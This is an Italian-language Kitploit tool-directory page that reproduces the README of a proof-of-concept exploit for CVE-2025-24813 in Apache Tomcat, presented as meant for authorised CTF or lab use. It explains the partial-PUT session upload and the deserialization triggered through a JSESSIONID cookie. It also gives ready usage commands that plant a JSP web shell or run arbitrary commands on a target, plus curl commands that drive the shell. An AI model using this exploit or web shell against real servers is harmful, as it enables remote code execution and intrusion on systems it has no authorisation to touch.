Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24813 — payload giusto per CVE Java | Kitploit
Strumenti/GitHubGitHub/loufa0/cve-2025-24813
Scanner di VulnerabilitàExploitSicurezza WebCTFApprendimento e FormazioneLab e Pratica
GitHubloufa0/cve-2025-24813

CVE-2025-24813

payload giusto per CVE Java

Vedi Repository
522 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24813 Tomcat PoC

PoC per un ambiente CTF/lab autorizzato. Sfrutta CVE-2025-24813 tramite la scrittura PUT parziale di un file di sessione Tomcat, quindi innesca la deserializzazione con JSESSIONID.

Prerequisiti

  • Python 3
  • Modulo Python requests
  • Java JDK (java e javac)
  • Il file incluso commons-collections-3.2.1.jar, posizionato in questa cartella

ysoserial non è richiesto.

File

  • poc_cve_2025_24813.py: wrapper Python che automatizza generazione, upload e trigger.
  • GenerateTomcatSessionPayload.java: genera una sessione Tomcat valida contenente un gadget .
Scarica lo strumento
CommonsCollections
  • commons-collections-3.2.1.jar: dipendenza del gadget.
  • sh.jsp: JSP shell opzionale distribuito da --drop-shell.
  • Utilizzo

    Distribuire una JSP shell nella webroot predefinita /opt/tomcat/webapps/ROOT:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --session-id poc24813 \
      --drop-shell \
      --shell-name sh.jsp
    

    Eseguire un comando diretto senza distribuire una shell:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --session-id cmd24813 \
      --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'
    

    Se la webroot è diversa:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --drop-shell \
      --webroot /path/to/webroot \
      --shell-name sh.jsp
    

    Se il JAR viene spostato, indicarne il percorso:

    root@kitploit:~
    ./poc_cve_2025_24813.py http://TARGET:8080 \
      --jar /path/to/commons-collections-3.2.1.jar \
      --drop-shell
    

    Dopo lo sfruttamento

    Se --drop-shell riesce:

    root@kitploit:~
    curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
    curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp
    

    Condizioni sul lato target

    • Versione Tomcat vulnerabile.
    • DefaultServlet scrivibile, tipicamente readonly=false.
    • Supporto del partial PUT.
    • Sessioni persistenti tramite PersistentManager e FileStore.
    • Gadget chain disponibile lato server, qui commons-collections.

    Il comportamento atteso durante l'upload è spesso HTTP 409 Conflict su:

    root@kitploit:~
    PUT /<session-id>/session
    Content-Range: bytes 0-1000/1200
    

    Quindi la deserializzazione viene innescata con:

    root@kitploit:~
    Cookie: JSESSIONID=.<session-id>